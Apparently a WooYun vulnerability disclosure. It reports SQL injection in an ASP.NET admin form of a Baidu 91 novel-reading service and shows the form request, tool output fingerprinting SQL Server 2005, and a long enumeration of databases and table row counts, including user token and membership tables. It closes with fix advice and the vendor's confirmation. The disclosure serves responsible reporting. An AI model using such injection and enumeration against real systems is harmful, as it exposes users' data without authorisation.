/wEWAgL5iZXwBQKd1pjuDkM/WynfA4ziA8/WZZmj9lyJWiisVwefIce/r3hKDRee
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_FormatType"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_IsAdd"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_gpList_SM"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtID"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtTitle"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_Value"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cmbMobileTypeNa
me_SelIndex"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUrl"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_Value"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType"
全显示
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_cbType_SelIndex
"
0
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtContect"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtUserIDS"
备注:以英文 , 分隔
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="MainContent_PandaPushEdit1_txtCreateTime"
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="submitDirectEventConfig"
{"config":{"extraParams":{"start":0,"limit":100,"sort":"ID","dir":"ASC"}}}
------WebKitFormBoundarydEuFUCx2QXyzCtlV
Content-Disposition: form-data; name="__ExtNetDirectEventMarker"
delta=true
------WebKitFormBoundarydEuFUCx2QXyzCtlV--
---
[00:58:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

漏洞证明:

看下数据库:

数据库.png


数据库数据项数:

Database: NovelDB2_Slave
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| dbo.Novel_MyAttention                                      | 35657862 |
| dbo.PandaCoinOrder_BulkPayChapter_2016                     | 20784845 |
| dbo.T_PandaUserLatestAction                                | 19243579 |
| dbo.AttachBookTbl                                          | 7688792 |
| dbo.PandaCoinConvert                                       | 6750304 |
| dbo.PandaCoinConvert_2012                                  | 2043063 |
| dbo.Novel_Book_2013BACK                                    | 126188  |
| dbo.BookProperty                                           | 118765  |
| dbo.Cosimple_PandaPartnersPriceStatis                      | 93504   |
| dbo.BookKeysTbl                                            | 83572   |
| dbo.Novel_Book                                             | 47889   |
| dbo.v_NovelBooks                                           | 35172   |
| dbo.BookTag                                                | 34397   |
| dbo.PandaBulkShopProduct                                   | 9716    |
| dbo.Novel_BookCategory                                     | 2452    |
| dbo.Cartoon                                                | 1519    |
| dbo.CartoonCategory                                        | 1098    |
| dbo.BookTagRelation                                        | 435     |
| dbo.MSreplication_objects                                  | 51      |
| dbo.MSreplication_subscriptions                            | 1       |
| dbo.MSsubscription_agents                                  | 1       |
+------------------------------------------------------------+---------+
Database: msdb
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| dbo.backupfile                                             | 204582  |
| dbo.backupmediafamily                                      | 6127    |
| dbo.backupmediaset                                         | 6127    |
| dbo.backupset                                              | 6127    |
| dbo.restorefile                                            | 240     |
| dbo.restorefilegroup                                       | 236     |
| dbo.restorehistory                                         | 4       |
+------------------------------------------------------------+---------+
Database: master
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| sys.messages                                               | 99632   |
| sys.sysmessages                                            | 99632   |
| sys.syscolumns                                             | 10759   |
| sys.all_parameters                                         | 6761    |
| sys.system_parameters                                      | 6761    |
| sys.trace_subclass_values                                  | 4729    |
| sys.trace_event_bindings                                   | 3965    |
| sys.all_columns                                            | 3793    |
| sys.system_columns                                         | 3749    |
| sys.syscomments                                            | 2793    |
| dbo.spt_values                                             | 2346    |
| sys.all_objects                                            | 1779    |
| sys.sysobjects                                             | 1779    |
| sys.system_objects                                         | 1773    |
| sys.database_permissions                                   | 1675    |
| sys.syspermissions                                         | 1675    |
| sys.sysprotects                                            | 1674    |
| sys.all_sql_modules                                        | 1621    |
| sys.system_sql_modules                                     | 1621    |
| sys.all_views                                              | 286     |
| sys.system_views                                           | 286     |
| sys.event_notification_event_types                         | 193     |
| sys.trace_events                                           | 171     |
| sys.syscharsets                                            | 114     |
| sys.allocation_units                                       | 112     |
| sys.partitions                                             | 101     |
| sys.system_components_surface_area_configuration           | 99      |
| sys.xml_schema_facets                                      | 97      |
| sys.xml_schema_components                                  | 93      |
| sys.xml_schema_types                                       | 77      |
| sys.configurations                                         | 65      |
| sys.sysconfigures                                          | 65      |
| sys.syscurconfigs                                          | 65      |
| sys.trace_columns                                          | 65      |
| sys.fulltext_document_types                                | 50      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES                       | 44      |
| INFORMATION_SCHEMA.COLUMNS                                 | 44      |
| sys.columns                                                | 44      |
| sys.syslanguages                                           | 33      |
| sys.systypes                                               | 27      |
| sys.types                                                  | 27      |
| sys.securable_classes                                      | 21      |
| sys.trace_categories                                       | 21      |
| sys.fulltext_languages                                     | 17      |
| sys.xml_schema_component_placements                        | 17      |
| INFORMATION_SCHEMA.SCHEMATA                                | 14      |
| sys.database_principals                                    | 14      |
| sys.schemas                                                | 14      |
| sys.sysusers                                               | 14      |
| sys.xml_schema_attributes                                  | 14      |
| sys.database_mirroring                                     | 12      |
| sys.database_recovery_status                               | 12      |
| sys.databases                                              | 12      |
| sys.sysdatabases                                           | 12      |
| sys.server_principals                                      | 11      |
| sys.service_contract_message_usages                        | 11      |
| sys.server_permissions                                     | 7       |
| sys.sysindexes                                             | 7       |
| sys.indexes                                                | 6       |
| sys.objects                                                | 6       |
| sys.stats_columns                                          | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES                        | 5       |
| INFORMATION_SCHEMA.TABLES                                  | 5       |
| sys.index_columns                                          | 5       |
| sys.sysindexkeys                                           | 5       |
| sys.tables                                                 | 5       |
| sys.endpoints                                              | 4       |
| sys.servers                                                | 4       |
| sys.sysservers                                             | 4       |
| sys.service_queue_usages                                   | 3       |
| sys.stats                                                  | 3       |
| sys.syssegments                                            | 3       |
| sys.xml_schema_namespaces                                  | 3       |
| sys.database_files                                         | 2       |
| sys.login_token                                            | 2       |
| sys.service_contract_usages                                | 2       |
| sys.sql_logins                                             | 2       |
| sys.sysfiles                                               | 2       |
| sys.syslogins                                              | 2       |
| sys.user_token                                             | 2       |
| dbo.spt_monitor                                            | 1       |
| sys.data_spaces                                            | 1       |
| sys.database_role_members                                  | 1       |
| sys.default_constraints                                    | 1       |
| sys.dm_exec_requests                                       | 1       |
| sys.dm_exec_sessions                                       | 1       |
| sys.filegroups                                             | 1       |
| sys.server_role_members                                    | 1       |
| sys.sysconstraints                                         | 1       |
| sys.sysfilegroups                                          | 1       |
| sys.sysmembers                                             | 1       |
| sys.sysprocesses                                           | 1       |
| sys.tcp_endpoints                                          | 1       |
| sys.via_endpoints                                          | 1       |
| sys.xml_schema_collections                                 | 1       |
| sys.xml_schema_model_groups                                | 1       |
| sys.xml_schema_wildcards                                   | 1       |
+------------------------------------------------------------+---------+
Database: PandaPublisher
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| dbo.Panda_PublisherLog                                     | 4772444 |
| dbo.PandaBlockIMEI                                         | 797150  |
| dbo.Panda_PushInfo                                         | 136358  |
| dbo.AttachmentIMEI                                         | 58188   |
| dbo.ChnApkBook_UploadManager                               | 26894   |
| dbo.ChapterTakeInfoLog                                     | 9896    |
| dbo.ApkBook_UploadManager                                  | 9517    |
| dbo.ApkBookManager                                         | 9386    |
| dbo.Adver_UserCredit                                       | 6061    |
| dbo.syncobj_0x3339453141353846                             | 6061    |
| dbo.ChapterToBlock                                         | 2805    |
| dbo.V_PandaChapterBookInfo                                 | 2768    |
| dbo.ChapterRcContent                                       | 2767    |
| dbo.PandaChapterManager                                    | 2767    |
| dbo.PandaChapterRcManager                                  | 2767    |
| dbo.ChapterContent                                         | 2766    |
| dbo.V_PandaChapterBookInfo_New                             | 2696    |
| dbo.ApkBook_NoExitsPackageLogs                             | 1992    |
| dbo.PandaUpdate_VersionCpManager                           | 1646    |
| dbo.ApkBook_UploadManager_bak                              | 1000    |
| dbo.Adver_AdverOfferPriceLog                               | 513     |
| dbo.ChapterToBlock_Back                                    | 370     |
| dbo.Adver_AdverFocusLog                                    | 309     |
| dbo.BookAttachmentManager                                  | 277     |
| dbo.PandaChapterRcManager_Bak                              | 275     |
| dbo.ChapterRcContent_Bak                                   | 274     |
| dbo.Panda_PublisherInterface                               | 79      |
| dbo.Adver_AdverManger                                      | 47      |
| dbo.syncobj_0x4434374643323037                             | 47      |
| dbo.PandaBlockManager                                      | 46      |
| dbo.Adver_UserCreaditConsumLog                             | 36      |
| dbo.ChnApkBook_UploadBatchManger                           | 33      |
| dbo.AttachmentManager                                      | 30      |
| dbo.sysarticlecolumns                                      | 21      |
| dbo.PandaUpdate_UpdateRulesManager                         | 18      |
| dbo.PandaUpdate_RuleToAttachment                           | 13      |
| dbo.ApkBookManager_bak                                     | 11      |
| dbo.Adver_AuctionStagesManger                              | 10      |
| dbo.syncobj_0x3646344539434238                             | 10      |
| dbo.BlockType                                              | 8       |
| dbo.Adver_AdverPosType                                     | 7       |
| dbo.ApkBook_VersionManager                                 | 6       |
| dbo.syssubscriptions                                       | 6       |
| dbo.Tool_TakeBlockDataCfg                                  | 6       |
| dbo.ApkBook_AttachmentManager                              | 5       |
| dbo.Adver_AdverPosManger                                   | 4       |
| dbo.ChnApkBook_ChnCfg                                      | 3       |
| dbo.sysarticles                                            | 3       |
| dbo.sysextendedarticlesview                                | 3       |
| dbo.PandaUpdate_Plist                                      | 2       |
| dbo.PricesManager                                          | 2       |
| dbo.ApkBook_VersionToAttachment                            | 1       |
| dbo.syspublications                                        | 1       |
| dbo.sysreplservers                                         | 1       |
+------------------------------------------------------------+---------+
Database: PandaStat
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| dbo.PandaRewardValue                                       | 139843999 |
| dbo.T_PandaUserRecommandStat_New                           | 40496503 |
| dbo.PandaCoinOrder_Release_Report_New                      | 40327364 |
| dbo.ReaderHeroUserCount                                    | 23092234 |
| dbo.ReaderHero_2013                                        | 22918893 |
| dbo.Shelf_ResourceRelation                                 | 21850695 |
| dbo.T_PandaUserMessage_Filter_UID                          | 17829829 |
| dbo.PandaUserSign                                          | 14205059 |
| dbo.ReaderHero                                             | 11103386 |
| dbo.PandaUserPriceSummary                                  | 10444487 |
| dbo.Boss_PandaActiveUID                                    | 8752728 |
| dbo.Sync_FileResource                                      | 6152073 |
| dbo.PandaUserPriceSummary_Back                             | 6123970 |
| dbo.ShakeShare_RecordLog                                   | 6109962 |
| dbo.Boss_RecommendReadHistory                              | 5522330 |
| dbo.ShakeShare_RecordLog_2013_BACK                         | 4959847 |
| dbo.Baidu_PushMessage                                      | 4572817 |
| dbo.PandaRewardValue_WeiXin                                | 3794336 |
| dbo.Boss_Baidu91ShopContent                                | 3711242 |
| dbo.Boss_PandaMessageFilterUser_Back                       | 2554602 |
| dbo.ShakeShare_RecordLog_2013                              | 1916064 |
| dbo.PandaFlowerValue                                       | 1690595 |
| dbo.ShakeShare_User                                        | 1642429 |
| dbo.Baidu_PushUser_201505                                  | 1357381 |
| dbo.Baidu_PushUser_201506                                  | 1357321 |
| dbo.Baidu_PushUser_201504                                  | 1357229 |
| dbo.Baidu_PushUser_201503                                  | 1349044 |
| dbo.Baidu_PushUser_201507                                  | 1338837 |
| dbo.Shelf_Book                                             | 1288454 |
| dbo.Baidu_PushUser_201508                                  | 1247541 |
| dbo.Baidu_PushUser_201509                                  | 1231954 |
| dbo.ShakeShare_Record_2013                                 | 1212188 |
| dbo.PandaPushMessage                                       | 1165947 |
| dbo.PandaEggValue                                          | 1124287 |
| dbo.ShakeShare_Record                                      | 867040  |
| dbo.T_PandaHotSearch_201507                                | 836465  |
| dbo.T_PandaHotSearch_201506                                | 794212  |
| dbo.Baidu_PushUser_201502                                  | 776096  |
| dbo.T_PandaHotSearch_201508                                | 770497  |
| dbo.Baidu_PushUser_201510                                  | 753329  |
| dbo.Boss_PandaUserMacToken_201407                          | 702283  |
| dbo.T_PandaHotSearch_201505                                | 688294  |
| dbo.T_PandaHotSearch_201503                                | 685133  |
| dbo.T_PandaHotSearch_201504                                | 682911  |
| dbo.Boss_PandaUserMacToken_201406                          | 668902  |
| dbo.Boss_PandaUserMacToken_201408                          | 667242  |
| dbo.T_PandaHotSearch_201509                                | 650774  |
| dbo.Boss_PandaUserMacToken                                 | 639823  |
| dbo.Boss_PandaUserMacToken_201309                          | 617232  |
| dbo.Boss_PandaUserMacToken_201409                          | 616750  |
| dbo.PandaMonthTicket                                       | 615053  |
| dbo.PandaPushMessage0610                                   | 597339  |
| dbo.Boss_PandaUserMacToken_201410                          | 589402  |
| dbo.Boss_PandaMulityWMLAuto                                | 562423  |
| dbo.T_PandaHotSearch_201510                                | 543463  |
| dbo.Boss_PandaUserMacToken_201405                          | 529042  |
| dbo.Boss_PandaUserMacToken_201411                          | 525432  |
| dbo.Boss_PandaUserMacToken_201502                          | 506896  |
| dbo.Boss_PandaUserMacToken_201412                          | 488224  |
| dbo.UrgeUpdatePandaCoin                                    | 462389  |
| dbo.Boss_PandaUserMacToken_201501                          | 458424  |
| dbo.Boss_PandaUserMacToken_201308                          | 435169  |
| dbo.Boss_PandaUserMacToken_201503                          | 432992  |
| dbo.Novel_BookFileToFtp                                    | 419103  |
| dbo.Boss_PandaUserMacToken_201504                          | 400777  |
| dbo.T_PandaUserMessage                                     | 400747  |
| dbo.Boss_PandaRootPageRecommend_History                    | 396066  |
| dbo.Boss_PandaUserMacToken_201505                          | 385159  |
| dbo.Boss_PandaUserMacToken_201506                          | 378259  |
| dbo.Boss_PandaUserMacToken_201507                          | 373561  |
| dbo.Boss_PandaUserMacToken_201510                          | 351302  |
| dbo.Boss_PandaUserMacToken_201508                          | 344976  |
| dbo.Boss_PandaUserMacToken_201509                          | 342709  |
| dbo.Boss_PandaUserMacToken_201511                          | 334753  |
| dbo.Boss_ActionEntrySTAT                                   | 313590  |
| dbo.Baidu_PushUser_201511                                  | 290244  |
| dbo.pandalog_0224                                          | 284551  |
| dbo.ShakeShare_ResourceRelation                            | 278005  |
| dbo.T_PandaResStat                                         | 259340  |
| dbo.PandaCoinOrder_BdPay_Receipt                           | 243646  |
| dbo.PC_MyReadHistory                                       | 214728  |
| dbo.ZhuShou_PandaCoinOrder                                 | 213120  |
| dbo.T_PandaHotSearch_201511                                | 187771  |
| dbo.PandaUserGiftCoin_Log                                  | 174225  |
| dbo.ReaderHeroTypeCheck                                    | 164161  |
| dbo.Boss_PandaBookMacToken                                 | 159591  |
| dbo.T_PandaResStat_03                                      | 132199  |
| dbo.PandaRewardTicketComment                               | 131890  |
| dbo.Boss_BatchDetails                                      | 129876  |
| dbo.PandaMonthTicketComment                                | 129395  |
| dbo.Boss_PandaUserMacToken_201512                          | 126022  |
| dbo.Boss_PandaChapterInfo                                  | 118026  |
| dbo.Boss_PandaRootPageRecommendUser                        | 104200  |
| dbo.Boss_PandaMessageFilterUser                            | 95771   |
| dbo.T_PandaResStat_Back                                    | 88961   |
| dbo.T_PandaUserAction                                      | 77638   |
| dbo.T_PandaUserAction_ForInsert                            | 77638   |
| dbo.T_PandaUserAction_Back                                 | 75534   |
| dbo.T_PandaUserAction_bak20150112                          | 66395   |
| dbo.Boss_ChannelIMEI                                       | 64735   |
| dbo.UrgeUpdateDetail                                       | 63297   |
| dbo.ShakeShare_UserOnLine                                  | 62448   |
| dbo.T_PandaResUpdateLength_Stat                            | 61439   |
| dbo.Baidu_PushUser_201512                                  | 60344   |
| dbo.PandaNotesComment                                      | 53789   |
| dbo.Boss_PandaBookGUID                                     | 33862   |
| dbo.Boss_UserShareSinaHistory                              | 32197   |
| dbo.PandaCoinOrder_AppStore_Report                         | 27843   |
| dbo.PC_MyPageFavorites                                     | 26461   |
| dbo.FileResourceMd5                                        | 24278   |
| dbo.UrgeUpdateUser                                         | 22712   |
| dbo.T_ProductFeedBackLog                                   | 22624   |
| dbo.PandaMonthTicketComment_2015                           | 22421   |
| dbo.ReaderHeroClickCount                                   | 22244   |
| dbo.Boss_ResourceTimer                                     | 18249   |
| dbo.Boss_AppDownloadHistory                                | 17208   |
| dbo.Boss_PandaBulkShopMonthly                              | 16887   |
| dbo.T_PandaResStat20150112                                 | 15000   |
| dbo.Boss_BatchHistory                                      | 11823   |
| dbo.T_PandaHotSearch_201512                                | 8858    |
| dbo.TencentAccessToken                                     | 7846    |
| dbo.Boss_UserShareSinaStat                                 | 7672    |
| dbo.PandaWeiXinShare                                       | 7045    |
| dbo.PandaAllBookGuid                                       | 4897    |
| dbo.T_PandaRes_TagEnum                                     | 3891    |
| dbo.T_PandaResUpdateLength_Stat_BACK2                      | 3468    |
| dbo.T_PandaResUpdateLength_Stat_BACK                       | 3327    |
| dbo.T_PandaUserMessageUID                                  | 1852    |
| dbo.PandaSndaUID                                           | 1720    |
| dbo.Boss_BatchWeiXin                                       | 1261    |
| dbo.T_PandaRes_SystemMessage                               | 707     |
| dbo.T_PandaRes_SystemMessage150207                         | 660     |
| dbo.Boss_PandaBulkShopProductHistory                       | 586     |
| dbo.Boss_PandaActivityFlow                                 | 141     |
| dbo.PandaPushMessage_V2                                    | 93      |
| dbo.Boss_PandaSiteConfig                                   | 91      |
| dbo.Boss_PandaAdvertisement                                | 80      |
| dbo.PandaStatEnum                                          | 74      |
| dbo.Boss_PandaRewardUser                                   | 71      |
| dbo.Boss_NameValues                                        | 58      |
| dbo.PandaFriendUrl                                         | 42      |
| dbo.T_PandaUserMessage_Filter                              | 35      |
| dbo.Boss_BatchList                                         | 31      |
| dbo.Baidu_PushUser_201501                                  | 26      |
| dbo.Boss_PandaRootPageRecommend                            | 26      |
| dbo.Boss_AppRecommend                                      | 11      |
| dbo.Boss_SysUser                                           | 10      |
| dbo.Boss_SearchWordInfo                                    | 9       |
| dbo.PandaUserSign_WeiXin                                   | 6       |
| dbo.Boss_PandaInitRecommend                                | 5       |
| dbo.Boss_BookshelfAdvert                                   | 3       |
| dbo.Boss_PandaMulityWML                                    | 3       |
| dbo.Boss_PandaNovelRegather                                | 2       |
| dbo.T_PandaResStatModify                                   | 2       |
| dbo.Boss_PandaActivity                                     | 1       |
| dbo.Boss_PandaReward                                       | 1       |
+------------------------------------------------------------+---------+
Database: CommentDB
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| dbo.Comment                                                | 1377900 |
| dbo.Comment_Back                                           | 614514  |
| dbo.UserCommentStat                                        | 491662  |
| dbo.CommentUpVoteHistory                                   | 170356  |
| dbo.CommentUpVote                                          | 170227  |
| dbo.ResourceCommentStat                                    | 118239  |
| dbo.CommentStat                                            | 59973   |
| dbo.ChapterUpVote                                          | 16583   |
| dbo.ChapterUpVoteHistory                                   | 16583   |
| dbo.CommentReward                                          | 10093   |
| dbo.ChapterStat                                            | 2964    |
| dbo.BlackList                                              | 2456    |
| dbo.FilterWords                                            | 2253    |
| dbo.CommentRewardCoinStat                                  | 1731    |
| dbo.ChapterReward                                          | 206     |
| dbo.T_BlackList                                            | 1       |
| dbo.T_FilterWords                                          | 1       |
+------------------------------------------------------------+---------+
Database: EBookDB_Slave
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| dbo.BookChapters                                           | 1550102 |
| dbo.ZineJournalPages                                       | 1378795 |
| dbo.v_TagResources                                         | 50531   |
| dbo.BookPrices                                             | 47410   |
| dbo.BookTagRelation                                        | 37721   |
| dbo.v_TagBooks                                             | 37510   |
| dbo.Books                                                  | 26382   |
| dbo.v_Books                                                | 26382   |
| dbo.BookTags                                               | 25986   |
| dbo.v_TagJournals                                          | 13021   |
| dbo.ZineJournalTagRelation                                 | 13021   |
| dbo.v_FullZines                                            | 7976    |
| dbo.v_Journals                                             | 7976    |
| dbo.ZineJournals                                           | 7976    |
| dbo.ZineJournalPrices                                      | 2796    |
| dbo.BookCategories                                         | 1211    |
| dbo.Publishers                                             | 966     |
| dbo.ZineJournalTags                                        | 572     |
| dbo.v_Zines                                                | 529     |
| dbo.Zines                                                  | 529     |
| dbo.UserGroups                                             | 256     |
| dbo.MSreplication_objects                                  | 45      |
| dbo.ZineCategories                                         | 41      |
| dbo.MSreplication_subscriptions                            | 1       |
| dbo.MSsubscription_agents                                  | 1       |
+------------------------------------------------------------+---------+
Database: AuthorDB
+------------------------------------------------------------+---------+
| Table                                                      | Entries |
+------------------------------------------------------------+---------+
| dbo.PandaReport_AuthorNovelStat_AllNovel                   | 4543829 |
| dbo.PandaAdmin_NovelDailySaleTotalAll                      | 4224946 |
| dbo.PandaReport_AuthorNovelMonthStat_bak                   | 3439361 |
| dbo.PandaAdmin_NovelDailySaleTotalAll_bak20140919          | 2686687 |
| dbo.PandaReport_AuthorUserScaleMerge_bak                   | 2081373 |
| dbo.PandaAdmin_AttendanceMonth_bak                         | 960896  |
| dbo.PandaAdmin_AuthorNovelChapter                          | 558957  |
| dbo.PandaReport_AuthorNovelChapterSale                     | 537130  |
| dbo.PandaReport_AuthorNovelChapterSale_201511              | 532436  |
| dbo.PandaReport_AuthorNovelChapterSale_201510              | 521006  |
| dbo.PandaReport_AuthorNovelChapterSale_201509              | 507699  |
| dbo.PandaReport_AuthorNovelChapterSale_201508              | 493875  |
| dbo.PandaReport_AuthorNovelChapterSale_201507              | 479165  |
| dbo.PandaReport_AuthorNovelChapterSale_201506              | 462092  |
| dbo.PandaReport_AuthorNovelStat                            | 454284  |
| dbo.PandaReport_AuthorNovelChapterSale_201505              | 444270  |
| dbo.PandaReport_AuthorNovelChapterSale_20140924            | 433891  |
| dbo.PandaReport_AuthorNovelChapterSale_201408              | 430993  |
| dbo.PandaAdmin_NovelDailySaleTotal                         | 423929  |
| dbo.PandaReport_AuthorNovelChapterSale_201407              | 421855  |
| dbo.PandaReport_AuthorNovelChapterSale_201504              | 420035  |
| dbo.PandaReport_AuthorNovelChapterSale_201406              | 410368  |
| dbo.PandaReport_AuthorNovelChapterSale_201503              | 397221  |
| dbo.PandaReport_AuthorNovelChapterSale_201405              | 395477  |
| dbo.PandaReport_AuthorNovelChapterSale_201502              | 392026  |
| dbo.PandaReport_AuthorNovelChapterSale_201412              | 391931  |
| dbo.PandaReport_AuthorNovelChapterSale_201501              | 390408  |
| dbo.PandaReport_AuthorNovelChapterSale_201411              | 388938  |
| dbo.PandaReport_AuthorNovelChapterSale_201404              | 387568  |
| dbo.PandaReport_AuthorNovelChapterSale_201410              | 385141  |
| dbo.PandaReport_AuthorNovelChapterSale_201409              | 381735  |
| dbo.PandaReport_AuthorNovelChapterSale_201403              | 377520  |
| dbo.PandaReport_AuthorNovelChapterSale_20140928            | 372945  |
| dbo.PandaReport_AuthorNovelChapterSale_201402              | 356846  |
| dbo.PandaReport_AuthorNovelChapterSale_Back2               | 356846  |
| dbo.PandaReport_AuthorNovelChapterSale_Back                | 355728  |
| dbo.PandaReport_AuthorNovelChapterSale_201401              | 338792  |
| dbo.PandaAdmin_AttendanceRecOrder                          | 320403  |
| dbo.PandaReport_AuthorNovelChapterSale_201312              | 313496  |
| dbo.PandaReport_AuthorNovelChapterSale_201311              | 288820  |
| dbo.PandaReport_AuthorNovelChapterSale_201310              | 260636  |
| dbo.PandaAdmin_AttendanceSendOrder                         | 255781  |
| dbo.PandaReport_AuthorNovelChapterSale_201309              | 237684  |
| dbo.PandaReport_AuthorNovelChapterSale_201308              | 211072  |
| dbo.PandaReport_AuthorNovelChapterSale_201307              | 180853  |
| dbo.PandaAdmin_AttendanceDay                               | 120706  |
| dbo.PandaAdmin_NovelDailySaleTotal_Bak20131209             | 110531  |
| dbo.PandaReport_AuthorNovelChapterSale_201306              | 109069  |
| dbo.PandaReport_AuthorNovelChapterSale_201305              | 89497   |
| dbo.PandaReport_AuthorNovelChapterSale_201304              | 75419   |
| dbo.PandaAdmin_ChapterTemp                                 | 66334   |
| dbo.PandaReport_AuthorNovelChapterSale_201303              | 64974   |
| dbo.PandaAdmin_AuthorMailBox                               | 64676   |
| dbo.PandaReport_AuthorNovelChapterSale_201302              | 56642   |
| dbo.PandaUploadBookManager                                 | 51121   |
| dbo.PandaReport_AuthorNovelMonthStat                       | 31763   |
| dbo.PandaAdmin_AttendanceError                             | 29506   |
| dbo.PandaReport_AuthorUserScaleMerge                       | 20682   |
| dbo.PandaAdmin_AttendanceMonth                             | 19692   |
| dbo.PandaReport_AuthorNovelMonthStat_bak20140521           | 17256   |
| dbo.PandaReport_AuthorUserScaleMerge_bak20140521           | 10360   |
| dbo.aspnet_Membership                                      | 10312   |
| dbo.aspnet_Users                                           | 10312   |
| dbo.vw_aspnet_MembershipUsers                              | 10312   |
| dbo.vw_aspnet_Users                                        | 10312   |
| dbo.aspnet_Membership_1507                                 | 10264   |
| dbo.aspnet_Users_150730                                    | 10264   |
| dbo.PandaReport_AuthorNovelMonthStat_bak20131223           | 10046   |
| dbo.PandaReport_AuthorNovelMonthStat_bak20131220           | 8277    |
| dbo.PandaReport_AuthorUserScaleMerge_bak20131223           | 6009    |
| dbo.PandaAdmin_AuthorUser                                  | 5791    |
| dbo.PandaAdmin_AuthorUserScale                             | 5783    |
| dbo.PandaSingleApp                                         | 5752    |
| dbo.aspnet_UsersInRoles_1507                               | 5182    |
| dbo.aspnet_UsersInRoles                                    | 5132    |
| dbo.vw_aspnet_UsersInRoles                                 | 5132    |
| dbo.PandaReport_AuthorUserScaleMerge_bak20131220           | 4933    |
| dbo.PandaAdmin_AttendanceMonth_bak20140521                 | 4703    |
| dbo.PandaAdmin_AuthorNovelBook                             | 4375    |
| dbo.PandaAdmin_AuthorNovelHandle                           | 4353    |
| dbo.PandaReport_AuthorUserArrearsAdvertisement_bak         | 3981    |
| dbo.PandaAdmin_UpdateBookContentLog                        | 3976    |
| dbo.PandaAdmin_AuthorNovelBook_20140310                    | 3577    |
| dbo.PandaAdmin_BookUrls                                    | 2852    |
| dbo.PandaAdmin_ChapterIllegal                              | 2059    |
| dbo.PandaAdmin_AuthorNovelBookMessage                      | 1903    |
| dbo.PandaAdmin_AuthorNovelVolume                           | 1834    |
| dbo.PandaAdmin_AuthorRecomment                             | 1679    |
| dbo.PandaAdmin_AttendanceMonth_bak20131223                 | 1261    |
| dbo.PandaAdmin_BookMessageSendState                        | 886     |
| dbo.PandaAdmin_AuthorUserBank                              | 636     |
| dbo.Panda_CompanyToBook                                    | 585     |
| dbo.PandaReport_AuthorUserScaleMergeDetail                 | 320     |
| dbo.PandaReport_AuthorUserScaleMergeBack                   | 296     |
| dbo.PandaReport_AuthorUserScale                            | 211     |
| dbo.PandaAdmin_BookContract                                | 200     |
| dbo.PandaWeixin_DraftBox                                   | 180     |
| dbo.PandaWeixin_UserIdToOperateId                          | 86      |
| dbo.PandaAdmin_AuthorNovelBookProxy                        | 24      |
| dbo.PandaReport_AuthorUserArrearsAdvertisement             | 21      |
| dbo.PandaReport_AuthorUserArrearsAdvertisement_bak20140521 | 21      |
| dbo.PandaAdmin_ViewConfig                                  | 15      |
| dbo.Publish_Company                                        | 8       |
| dbo.PandaAdmin_UserGroup                                   | 7       |
| dbo.aspnet_SchemaVersions                                  | 6       |
| dbo.PandaAdmin_AttendanceParam                             | 6       |
| dbo.ext_ObjectMetadata                                     | 4       |
| dbo.PandaAdmin_Announcement                                | 3       |
| dbo.aspnet_Organizations                                   | 2       |
| dbo.aspnet_Applications                                    | 1       |
| dbo.aspnet_OrganizationTypes                               | 1       |
| dbo.aspnet_Roles                                           | 1       |
| dbo.PandaAdmin_AuthorInterview                             | 1       |
| dbo.vw_aspnet_Applications                                 | 1       |
| dbo.vw_aspnet_Roles                                        | 1       |
| dbo.查询                                                       | 1       |
+------------------------------------------------------------+---------+


两千多万用户信息

111.png

修复方案:

1、建议统一排查下弱口令
2、内部系统注入不少,建议完整性自查一遍
2、给系统加个waf等安全防护软件

版权声明:转载请注明来源 Looke@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-03 11:01

厂商回复:

感谢,转百度91修复

最新状态:

暂无

漏洞评价:

评价